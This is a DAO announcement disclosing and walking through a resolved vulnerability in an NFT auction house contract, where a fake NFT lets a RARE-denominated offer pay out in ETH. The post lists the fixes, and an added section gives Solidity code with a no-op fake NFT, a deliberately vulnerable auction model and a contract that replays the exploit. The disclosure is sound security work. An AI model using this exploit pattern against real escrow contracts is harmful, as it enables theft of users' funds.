RESOLVED: Auction house contract vulnerability walkthrough

Hello Fellow DAO members,

This post announces a vulnerability in the auction house contract that was brought to the attention of the DAO Council and has since been resolved.

TLDR;

Funds safu. The DAO Council suspended RARE payments while a fix was implemented. The fix went live September 4th, 2023 11:43:35 PM UTC and also reinstated RARE payments.

Details

On August 19th, @ayeslick brought to the DAO Council's attention a vulnerability in the convertOfferToAuction function of the auction house logic contract.

RARE Payments Disabled

The exploit was only viable so long as RARE payments were enabled. The council temporarily suspended RARE payments until the fix went live.

Summary of the Vulnerability

The short version: one could create an auction in RARE, switch it to an ETH auction, and have the auction pay out in ETH.

This was possible by using a fake NFT contract. By fake I mean an NFT contract that didn't actually change owners when its transfer function was called. Because our auction contract escrows the NFT, it assumed that once an auction started the NFT was in escrow, and therefore that nobody could configure another auction for it. With the fake NFT contract, an auction in RARE could be started via convertOfferToAuction while the NFT stayed with the exploiter, who could then configure a new auction for the same token with the converted offer (now a bid) remaining in place.

The exploiter could configure that new auction in a different currency, in this case ETH. Once the auction settled, the auction creator was paid out in ETH an amount equal to the RARE initially put up when convertOfferToAuction was called.

An explanation as well as a test case exist on the repository. See this Pull Request for further details.

Resolution

This was fixed by:

  1. Preventing an auction from being configured if a bid already exists (i.e. it is a running auction)
  2. Adding a check that prevents convertOfferToAuction from running if there is a running or unsettled auction
  3. Settling an auction by referencing the currency sent with the bid, so that it only ever pays out in the same currency that was sent into the contract

Here is a link to the new implementation.
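As an added illustration (not the project's code, and not taken from the pull request or implementation linked above), the Solidity below models the three pieces of the walkthrough: a fake NFT whose transferFrom never moves the token, a stripped-down auction house whose escrow assumption that breaks, and the same contract with the three fixes listed under Resolution switched on. Every contract, function and field name other than convertOfferToAuction is assumed for the example; the RARE token address is a placeholder, and payouts are recorded in an `owed` mapping rather than transferred so the currency confusion is visible directly in state.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Only the two ERC-721 calls the model below relies on.
interface IERC721Like {
    function ownerOf(uint256 tokenId) external view returns (address);
    function transferFrom(address from, address to, uint256 tokenId) external;
}

// ASSUMPTION (hypothetical contract): the "fake NFT" from the post.
// transferFrom returns normally but never moves the token, so an escrow
// that trusts transferFrom to have happened is fooled, and ownerOf keeps
// reporting the attacker as owner after the supposed escrow.
contract FakeNFT is IERC721Like {
    address public immutable holder;
    constructor(address holder_) { holder = holder_; }
    function ownerOf(uint256) external view override returns (address) { return holder; }
    function transferFrom(address, address, uint256) external override {} // no-op on purpose
}

// ASSUMPTION: a deliberately minimal model of the auction house, not the
// real contract. Currencies are addresses, address(0) standing for ETH.
// `hardened` toggles the three checks listed under Resolution.
contract AuctionHouseModel {
    address public constant ETH = address(0);

    struct Offer { address offeror; address currency; uint256 amount; }
    struct Auction {
        address creator;
        address currency;     // currency the creator configured
        address bidder;
        uint256 bidAmount;
        address bidCurrency;  // currency the bid was actually paid in (used by fix 3)
    }

    mapping(address => mapping(uint256 => Offer)) public offers;
    mapping(address => mapping(uint256 => Auction)) public auctions;
    mapping(address => mapping(address => uint256)) public owed; // payee => currency => amount
    bool public immutable hardened;
    constructor(bool hardened_) { hardened = hardened_; }

    // Offers are funded up front in the real contract; the model only records them.
    function makeOffer(address nft, uint256 id, address currency, uint256 amount) external {
        offers[nft][id] = Offer(msg.sender, currency, amount);
    }

    // The owner accepts an offer by turning it into the opening bid of an auction.
    function convertOfferToAuction(address nft, uint256 id) external {
        require(IERC721Like(nft).ownerOf(id) == msg.sender, "not owner");
        if (hardened) require(auctions[nft][id].creator == address(0), "auction running/unsettled"); // fix 2
        Offer memory o = offers[nft][id];
        IERC721Like(nft).transferFrom(msg.sender, address(this), id); // "escrow": a no-op for FakeNFT
        auctions[nft][id] = Auction(msg.sender, o.currency, o.offeror, o.amount, o.currency);
        delete offers[nft][id];
    }

    // Ownership is read from the NFT contract: a genuinely escrowed token reports
    // the auction house as owner, the fake one still reports the attacker.
    function configureAuction(address nft, uint256 id, address currency) external {
        require(IERC721Like(nft).ownerOf(id) == msg.sender, "not owner");
        Auction storage a = auctions[nft][id];
        if (hardened) require(a.bidder == address(0), "bid exists"); // fix 1
        a.creator = msg.sender;
        a.currency = currency; // vulnerable path: new currency, old bidder and bidAmount kept
    }

    function settleAuction(address nft, uint256 id) external {
        Auction memory a = auctions[nft][id];
        require(a.bidder != address(0), "no bid");
        address payoutCurrency = hardened ? a.bidCurrency : a.currency; // fix 3: pay in what came in
        owed[a.creator][payoutCurrency] += a.bidAmount;
        delete auctions[nft][id];
    }
}

// Replays the sequence from the post. This contract plays the attacker, so it is
// the FakeNFT holder and, for brevity, also the offeror (a second wallet in practice).
contract Walkthrough {
    address public constant RARE = address(0xBEEF); // ASSUMPTION: stand-in for the RARE token address

    // Returns the ETH the model now owes the attacker for a RARE-denominated offer.
    // With hardened = false this is rareAmount; with hardened = true the call
    // reverts at configureAuction with "bid exists".
    function run(bool hardened, uint256 rareAmount) external returns (uint256 ethOwed) {
        AuctionHouseModel house = new AuctionHouseModel(hardened);
        FakeNFT nft = new FakeNFT(address(this));
        house.makeOffer(address(nft), 1, RARE, rareAmount);
        house.convertOfferToAuction(address(nft), 1);        // bid recorded in RARE; token never moved
        house.configureAuction(address(nft), 1, house.ETH()); // re-configure the same token in ETH
        house.settleAuction(address(nft), 1);
        return house.owed(address(this), house.ETH());
    }
}
```

Deploy Walkthrough and call run(false, n): the attacker ends up owed n ETH for an offer that was funded in RARE. With run(true, n) the call reverts at configureAuction, which is the first fix; calling configureAuction before convertOfferToAuction instead trips the second; and the third fix makes settleAuction pay in bidCurrency even if the first two were somehow bypassed, which is why all three are worth keeping.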

Acknowledgements

Huge thank you to Ayeslick for bringing this to our attention discreetly through our bug bounty program.

Another big thank you to @koloz for writing the majority of the fix to get this resolved in a timely manner.


Ayeslick published a more involved post here!

I highly recommend it for any Solidity devs, as it's a great read.